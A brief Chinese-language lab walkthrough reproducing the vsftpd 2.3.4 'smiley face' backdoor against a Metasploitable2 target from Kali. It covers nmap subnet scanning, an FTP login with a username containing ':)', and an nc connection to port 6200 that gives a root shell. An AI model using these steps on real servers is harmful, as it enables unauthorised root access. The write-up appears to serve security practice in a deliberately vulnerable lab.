vsftpd 2.3.40笑脸后门复现

1.实验准备：kali虚拟机、metasploitable2靶机，两台虚拟机均为NAT链接
2.运行kali和metasploitable2
3.在kali用nmap上扫描局域网内存活主机指令:nmap 本机ip/24
4.发现metasploitable2 靶机，对其进行nmap操作得到如下结果!
发现其ftp使用的是vsftpd 2.3.4，存在笑脸后门漏洞。
5.
ftp登录输入指令:ftp metasploitable2的ip,输入账户：任意字符包含:)
输入密码：随意
打开另外一个命令框输入指令 nc metasploitable的ip 6200
此时成功获得靶机最高权限输入whoami指令得到如下结果：
渗透成功！